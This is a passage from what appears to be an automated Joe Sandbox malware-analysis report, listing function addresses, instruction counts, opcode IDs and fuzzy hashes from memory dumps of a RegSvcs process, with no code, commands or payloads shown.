                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c83670952b76183a0223d674689c302ec19a08dc4189461f6384b0b0effb7db0
                                                                        • Instruction ID: 31eed8c1a69288b5fcdf00affed0c215d1eb00ad6fe1e48aa1f879e933e58048
                                                                        • Opcode Fuzzy Hash: c83670952b76183a0223d674689c302ec19a08dc4189461f6384b0b0effb7db0
                                                                        • Instruction Fuzzy Hash: 9451D434F101259FEF64666CE89477F366ED789310F20042AE10AD73A5CA7CDC8187A2
                                                                        Function 066390DF Relevance: .2, Instructions: 158COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1dd52ad363bbabbe85f646c375ad5a55f8389d3a324b73d2be3825d440b7a442
                                                                        • Instruction ID: 9dadc8c44530f19d344f85eb025dc22a765162a0f85f7bc6cd0bc48104d3844c
                                                                        • Opcode Fuzzy Hash: 1dd52ad363bbabbe85f646c375ad5a55f8389d3a324b73d2be3825d440b7a442
                                                                        • Instruction Fuzzy Hash: 94516E35B051568FDB94DB74D990BAEB3F6AF88340F10856AC80AEB344EB70DC128F91
                                                                        Function 06635140 Relevance: .1, Instructions: 134COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6f4b51d288f7b639a6d37fe47a9309fc8d098912639b75f31b07ebe5bab57ad4
                                                                        • Instruction ID: f872dbd205921d342b3a628f52c77623fdbe6e8730a5f952736334f639f8d43d
                                                                        • Opcode Fuzzy Hash: 6f4b51d288f7b639a6d37fe47a9309fc8d098912639b75f31b07ebe5bab57ad4
                                                                        • Instruction Fuzzy Hash: D2418274E002158FDF64CEA9C980BBEB7B2FB85310F24892AE557DB391C635D981CB91
                                                                        Function 06634710 Relevance: .1, Instructions: 132COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5eb680eeaeef78af50618dd5cae8fbd6ad80631678bbb97cbb80de2c7d57e5d4
                                                                        • Instruction ID: 3b25f0e26037a668fe43f69f81c847839a6565c2adf74456c31191c48e4c74b8
                                                                        • Opcode Fuzzy Hash: 5eb680eeaeef78af50618dd5cae8fbd6ad80631678bbb97cbb80de2c7d57e5d4
                                                                        • Instruction Fuzzy Hash: 7A417275F102089FDB559FA4C845BAEBBF6FF88710F20852AE105AB399DE718C458B90
                                                                        Function 06634FD8 Relevance: .1, Instructions: 126COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: de5f3e38f688f8a2d13efbb3f52de81f1790f16b6714fa587e382593748cb2e2
                                                                        • Instruction ID: 327db7efb723a071e593a16497a7af1225fad477e30b2c9aebee29adf13fc488
                                                                        • Opcode Fuzzy Hash: de5f3e38f688f8a2d13efbb3f52de81f1790f16b6714fa587e382593748cb2e2
                                                                        • Instruction Fuzzy Hash: 92416C71E006198BDF70CEA9D8C1AAFFBF2EB84314F10492AE256D7654D731E9458BD0
                                                                        Function 0663DA6D Relevance: .1, Instructions: 119COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1765109e14bcc86a290b4f79247aa1eef70ef461610f8013df087a6388bf0771
                                                                        • Instruction ID: 48e347a4c86f6fc224ccfc89cbe1aebc58a66cadab278cac488e53bec18dcd6f
                                                                        • Opcode Fuzzy Hash: 1765109e14bcc86a290b4f79247aa1eef70ef461610f8013df087a6388bf0771
                                                                        • Instruction Fuzzy Hash: DF41B270E1022A9FDB55DF75C984A9EBBB2FF85340F14452AE406DB340DB70E946CB91
                                                                        Function 0663DA80 Relevance: .1, Instructions: 117COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 931498bd71d9d7f3bccbc20e4607bf3df880a82f57475fb29403ca7d43eaefba
                                                                        • Instruction ID: c42af5a109fcb6bb17fccf99af35a95710dc38077952076ff56195684810c3b7
                                                                        • Opcode Fuzzy Hash: 931498bd71d9d7f3bccbc20e4607bf3df880a82f57475fb29403ca7d43eaefba
                                                                        • Instruction Fuzzy Hash: 23417E70E1062ADFDB65DFA5C9847AEBBB6BF85340F20452AD406EB340DB70D946CB81
                                                                        Function 066321C0 Relevance: .1, Instructions: 105COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4a41aa8842180e08532bba1816b2350ae170dd40b5255f81f2b01a0119bbf7c4
                                                                        • Instruction ID: e5e5f43fbbc52be2871eb84200bbb84f778dbbbeeefb1767fe36ba0603939463
                                                                        • Opcode Fuzzy Hash: 4a41aa8842180e08532bba1816b2350ae170dd40b5255f81f2b01a0119bbf7c4
                                                                        • Instruction Fuzzy Hash: 7731F030B0021A8FDB19AB74D964B6F7BE7AF89600F204469D402DB380DF31CE82CB90
                                                                        Function 066321BF Relevance: .1, Instructions: 100COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 121e6e24442c3713ad428b2e2ea479f48e4633ccab8aa8936eefad86c438e1a4
                                                                        • Instruction ID: d0eae2473905a208b397746bd30b53c10c882ac4669a9ea38193a3d723912147
                                                                        • Opcode Fuzzy Hash: 121e6e24442c3713ad428b2e2ea479f48e4633ccab8aa8936eefad86c438e1a4
                                                                        • Instruction Fuzzy Hash: 2631C130B102168FDB59AB74D964B7E77E7AF89600F244569D402DB385DF31CE86CB90
                                                                        Function 06632080 Relevance: .1, Instructions: 91COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 50f8cd148d20644a4c431505c82c4202525d4e3ae5b32350335b38110860a39d
                                                                        • Instruction ID: ee21a9f18e0aaec4ba477daf11469492779a8a4b2be90b380aa9557c95d83a46
                                                                        • Opcode Fuzzy Hash: 50f8cd148d20644a4c431505c82c4202525d4e3ae5b32350335b38110860a39d
                                                                        • Instruction Fuzzy Hash: B0318230E106159BDB59CFA4D86869EF7F6BF89300F108519E906E7350DB71ED46CB40
                                                                        Function 0663207F Relevance: .1, Instructions: 89COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dd800df170f3a4ebc3f475281623f74d253680551f9e1ddf9486752acf1cf1fb
                                                                        • Instruction ID: ecfa73fe194c44ca676e0039ebec43b5df17f3e0fd920577cc9aadec2dfe6411
                                                                        • Opcode Fuzzy Hash: dd800df170f3a4ebc3f475281623f74d253680551f9e1ddf9486752acf1cf1fb
                                                                        • Instruction Fuzzy Hash: 3031A030E106169BDB19CFA4D9A869EB7B6BF89300F108519E906EB350DB71ED46CB40
                                                                        Function 06633A58 Relevance: .1, Instructions: 86COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6ea61edb9811a41a26e6c806e0cd4f6978b1b9e7806c54093e20a1177e80362e
                                                                        • Instruction ID: 23b828575ca0d06cbbfea7705868fd4339a4f736497d7d4609048f4a56922192
                                                                        • Opcode Fuzzy Hash: 6ea61edb9811a41a26e6c806e0cd4f6978b1b9e7806c54093e20a1177e80362e
                                                                        • Instruction Fuzzy Hash: E1218D79E012559FDB50DF79D881AAEBBF5EB48250F104069E905EB390D731DC518BA0
                                                                        Function 06633A68 Relevance: .1, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6119b6a692257ff6793b371f4ce2335817e63d4117809e629f122d73a2f8d27e
                                                                        • Instruction ID: 1c291eb70e4ede535b077d1692deb125aa35fbb11ae6ad1d0af6aea7883a5275
                                                                        • Opcode Fuzzy Hash: 6119b6a692257ff6793b371f4ce2335817e63d4117809e629f122d73a2f8d27e
                                                                        • Instruction Fuzzy Hash: 2621AC79F0025A9FDB50DF79D980AAEBBF5FB48310F108069E905EB380E730D8118B90
                                                                        Function 0663AEC0 Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e7abee472d2878ba3ab8ed82b660ab436c96b93281b3ddaba448555f9660c418
                                                                        • Instruction ID: a4b6f6fb6704e18b4395a2209a131cd7eb4e8f29139fbe4edc288f71a3e6a789
                                                                        • Opcode Fuzzy Hash: e7abee472d2878ba3ab8ed82b660ab436c96b93281b3ddaba448555f9660c418
                                                                        • Instruction Fuzzy Hash: 78215E71D1076A8BDF65CFA9C84469EBBB5FF85310F10892AE849EB340DBB09945CB81
                                                                        Function 00C0D030 Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3368350191.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_c0d000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3f5746b1a8fcb267e1abe8ef70c9aba0aa4e6571195fdfa8e3d5084f4d833f44
                                                                        • Instruction ID: de84dc21d5b9cba22eab03fef2c9d05a35098aa9437dcb6d822bd63cb58661eb
                                                                        • Opcode Fuzzy Hash: 3f5746b1a8fcb267e1abe8ef70c9aba0aa4e6571195fdfa8e3d5084f4d833f44
                                                                        • Instruction Fuzzy Hash: 6621F271604304DFDB14DF54D980B26BBA5EB84318F34C56DE90E4B296C37AD847CA62
                                                                        Function 00C0D005 Relevance: .1, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3368350191.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_c0d000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9bb05e7e36f6c53d6d6c22b753d9086923e38181a5decdbb8cce00e5fed4577d
                                                                        • Instruction ID: 7715156d0442e6caa09d1ec033067880eda2a49a56474bf96ebe11e5006cb9bf
                                                                        • Opcode Fuzzy Hash: 9bb05e7e36f6c53d6d6c22b753d9086923e38181a5decdbb8cce00e5fed4577d
                                                                        • Instruction Fuzzy Hash: 16215C7150D3C09FCB03CF64D990711BF71AB46214F29C5EBD8898F2A7C23A980ACB62
                                                                        Function 066368B0 Relevance: .1, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6ddc53e03e180fbd46daba7fa8926ae0decd9963d60f0e162cba89c9cbfbdb6a
                                                                        • Instruction ID: 93ddd7d0dc0121125624e493ceb378c17fcc34c96679b58f146f73daf296ba0c
                                                                        • Opcode Fuzzy Hash: 6ddc53e03e180fbd46daba7fa8926ae0decd9963d60f0e162cba89c9cbfbdb6a
                                                                        • Instruction Fuzzy Hash: D321B434F00129ABDF94DB69E85469DB7F6EF84310F108479E406DB380DB31DD518B84
                                                                        Function 06633DB0 Relevance: .1, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c9b1de44c2dc6103201734f5653cae8774f5733a3bde2d490b54b9b7ed907fc7
                                                                        • Instruction ID: ec6fd1e2ff0cb20cddee1efd315112757cd4debf72ff1e183a9b9b0b3ef0c39c
                                                                        • Opcode Fuzzy Hash: c9b1de44c2dc6103201734f5653cae8774f5733a3bde2d490b54b9b7ed907fc7
                                                                        • Instruction Fuzzy Hash: F211D231B042A00FEB61867DD85176BBBDADBCA710F14846BE50ACB381EE61CC024395
                                                                        Function 06633B69 Relevance: .1, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6bc03c46edeb2d9e9add127cfff921a0c6175b8ce8eab7c8cbefa1703104098d
                                                                        • Instruction ID: eea28ca874ecff06a5e937b8191caa01ffcd0f66c9515abd560ebb2cd6a0b12a
                                                                        • Opcode Fuzzy Hash: 6bc03c46edeb2d9e9add127cfff921a0c6175b8ce8eab7c8cbefa1703104098d
                                                                        • Instruction Fuzzy Hash: 6701D43AB150691FDB54E5B9EC50AFB73AADBC8650F00403AD40AFB344EE218C0287E1
                                                                        Function 06633B78 Relevance: .1, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 60d98267e786a5216cf18f77d75e6a87797dc91c68d571d61551e7850520969a
                                                                        • Instruction ID: 359269c8b0829e2e805e99ed9c556474301b4a6b1b4afa9057e391d38c524930
                                                                        • Opcode Fuzzy Hash: 60d98267e786a5216cf18f77d75e6a87797dc91c68d571d61551e7850520969a
                                                                        • Instruction Fuzzy Hash: 7C116135B141694FDF54AA79D814AAE73EAEBC8710F008579D407EB354EE25DC028B91
                                                                        Function 0663ED37 Relevance: .1, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 57bc6acd44463b25c12214950fe50633e268266273bc45f3e28ed9b6de85f32d
                                                                        • Instruction ID: a7082b48168ab01dad0e46831e01e9f15157c2b84886a961086498d15d47ef43
                                                                        • Opcode Fuzzy Hash: 57bc6acd44463b25c12214950fe50633e268266273bc45f3e28ed9b6de85f32d
                                                                        • Instruction Fuzzy Hash: C301B135B105104BDB659A3CD894B6EB7EADBC9620B14C87AE50ECB345EE21EC0287A1
                                                                        Function 06633830 Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fe14736ca06f74c4a2453043fa2a3ddb9f065e291c89d28857cb857ddaa5d8e9
                                                                        • Instruction ID: 55b0395413d8ba893cf8916ceac28ba2de1455678525572cabf4dc8d6ec2d270
                                                                        • Opcode Fuzzy Hash: fe14736ca06f74c4a2453043fa2a3ddb9f065e291c89d28857cb857ddaa5d8e9
                                                                        • Instruction Fuzzy Hash: 5521CEB5D01659AFDB00CF9AD984ADEFBB4FB48214F10812AE918B7340D378A954CFA5
                                                                        Function 06633018 Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 863028efeb8c1a9d422c779e39ee75c365b6908dd0205e8262d1f3b037ece342
                                                                        • Instruction ID: aba7ea0b96ef5fbe1606e8e77c4b25025a6978138a46f097f3e328c954351ffb
                                                                        • Opcode Fuzzy Hash: 863028efeb8c1a9d422c779e39ee75c365b6908dd0205e8262d1f3b037ece342
                                                                        • Instruction Fuzzy Hash: 7B016D71E002689ACB64DBB9D8515DEFBB5EB88310F10857AD516FB300EB31DA41CBE4
                                                                        Function 06633838 Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 435b7c1da700993bbf448abfe5089d174c7b94160672256aabc1ea9703ce7d5b
                                                                        • Instruction ID: 9cdc8567f1bcfbc7ec8c3c0aafb9fe4356ff77a422bb126d3d0eb388ea29b6fe
                                                                        • Opcode Fuzzy Hash: 435b7c1da700993bbf448abfe5089d174c7b94160672256aabc1ea9703ce7d5b
                                                                        • Instruction Fuzzy Hash: 8E11B2B5D01659AFDB00CF9AD884ADEFBB8FB48714F10812AE918B7340D374A954CFA5
                                                                        Function 0663A2A8 Relevance: .1, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 76cb9c7c1b38f545ff0f647f4cf0406cb2df7c50a0e8df1574d217b29bc50af9
                                                                        • Instruction ID: ef6784acf6ecb5d5e75614b77ae70c255ab26b00a4ecf177361feea45decf2c5
                                                                        • Opcode Fuzzy Hash: 76cb9c7c1b38f545ff0f647f4cf0406cb2df7c50a0e8df1574d217b29bc50af9
                                                                        • Instruction Fuzzy Hash: 53012B39B040100FE7A5D6B8E990B6E7BD1DB89710F14446AF54ACF351EE11DC428340
                                                                        Function 06633DC0 Relevance: .1, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7f3599a9e70c28b28475ef13482d7f638add83844abdca7bfc27aad9b568904f
                                                                        • Instruction ID: 6d7890ffa0877fb9ccc609949169eeda4b9ddfc0945b2bb55ea3ad2938c62298
                                                                        • Opcode Fuzzy Hash: 7f3599a9e70c28b28475ef13482d7f638add83844abdca7bfc27aad9b568904f
                                                                        • Instruction Fuzzy Hash: 14012830B101600BEBA4967DD45572FB3DADBC9720F10843AF60ECB380EE61DC020384
                                                                        Function 0663ED48 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 53de9a1715194b5b695f525ed731e1f506c8fc98e4395eaba422f017e625e8b6
                                                                        • Instruction ID: c6876370779bb163040676c196fdc81f158b3138737ed31e4c5cb2d653ea569c
                                                                        • Opcode Fuzzy Hash: 53de9a1715194b5b695f525ed731e1f506c8fc98e4395eaba422f017e625e8b6
                                                                        • Instruction Fuzzy Hash: 4E01AF31B100210BDBA5967CD855B6E67DACBC9720F10883AF50ACB380EE22DC0287A5
                                                                        Function 0663A2B8 Relevance: .0, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f838c2d9983efd62fbca1e40a338380b671b88d547dd38c8d9c23dcfd2d5669f
                                                                        • Instruction ID: 5c3a6046e56670c86b3c057587ef5d81b0cd577d0a9af3f41e2166932b8b1436
                                                                        • Opcode Fuzzy Hash: f838c2d9983efd62fbca1e40a338380b671b88d547dd38c8d9c23dcfd2d5669f
                                                                        • Instruction Fuzzy Hash: 3B01A434B140214FEBA4EABCE855B2E77D6DB89710F108429E50ACB350EE21DC024784
                                                                        Function 0663C790 Relevance: .0, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b694fece11de3e39502198d95713b19a6d104731bad757cb4f87039a8ea247fd
                                                                        • Instruction ID: 294056cd8c7a6e359a601853a13c71c895e358b6ae95a88417c7016b4e94f28a
                                                                        • Opcode Fuzzy Hash: b694fece11de3e39502198d95713b19a6d104731bad757cb4f87039a8ea247fd
                                                                        • Instruction Fuzzy Hash: C1012831F10238ABDB64AA79EC45A9DB775FBC4314F00447AF905EB380DB71A9018B90
                                                                        Function 06637E68 Relevance: .0, Instructions: 40COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c86b72599c7d4475c0191d5a5c618d79646fec37e05b05b2b343a491bdd29f4c
                                                                        • Instruction ID: 8ea5fadef744ebb91e37136de3067f437fbc4f36ef4e48dbaa5878fc0e87fa4f
                                                                        • Opcode Fuzzy Hash: c86b72599c7d4475c0191d5a5c618d79646fec37e05b05b2b343a491bdd29f4c
                                                                        • Instruction Fuzzy Hash: 21F0F478B04366CFEFA49A54E9802B87FA5EB80311F14846AD904CB345DB31DD05CB98
                                                                        Function 06636008 Relevance: .0, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 155765d022927ed5ab7b1306744ce44df1090a45ae4f0a58d5b2b39fdfc0233e
                                                                        • Instruction ID: bed114e63de0731dedfbb5d02b56eea6ab784309aac74a55feadc1338956c12d
                                                                        • Opcode Fuzzy Hash: 155765d022927ed5ab7b1306744ce44df1090a45ae4f0a58d5b2b39fdfc0233e
                                                                        • Instruction Fuzzy Hash: BBE0D8B1E05289BBCB50CAB0DF437AB7B64DB01209F204597D409DB241D337DE0287E1
                                                                        Function 06636018 Relevance: .0, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
